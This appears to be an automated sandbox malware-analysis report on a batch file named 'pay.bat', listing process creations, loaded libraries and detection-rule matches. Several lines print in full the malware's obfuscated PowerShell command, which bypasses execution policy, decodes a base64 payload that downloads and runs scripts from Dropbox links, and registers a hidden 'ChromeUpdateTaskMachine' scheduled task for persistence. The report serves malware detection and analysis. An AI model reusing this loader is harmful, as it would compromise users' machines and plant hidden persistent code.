                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7720DD3_2_00007FFD9B7720DD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8466013_2_00007FFD9B846601
                Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal96.troj.evad.winBAT@6/14@3/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\chrome.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wb0oqvof.0lp.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeDJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                barindex
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeDJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B67D2A5 pushad ; iretd 2_2_00007FFD9B67D2A6
